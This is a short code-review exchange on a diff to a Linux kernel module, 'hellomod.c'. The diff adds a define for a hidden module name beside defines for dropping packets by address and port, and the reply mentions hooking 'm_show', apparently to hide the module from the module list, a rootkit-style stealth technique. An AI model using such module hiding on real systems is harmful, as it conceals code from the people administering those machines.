hellomod.c

```diff
@@ -35,10 +35,12 @@
 #define DROP_SIP "\x08\x08\x08\x08"
 #define DROP_ARP_SIP "\x0a\x00\x00\xfa"
 #define DROP_SPORT 5999
+#define HIDDEN_MOD_NAME "mymod"
```

Comment:
can you get it dynamically?

Reply:
Thanks, I am now using THIS_MODULE->name inside the m_show hook. DONE.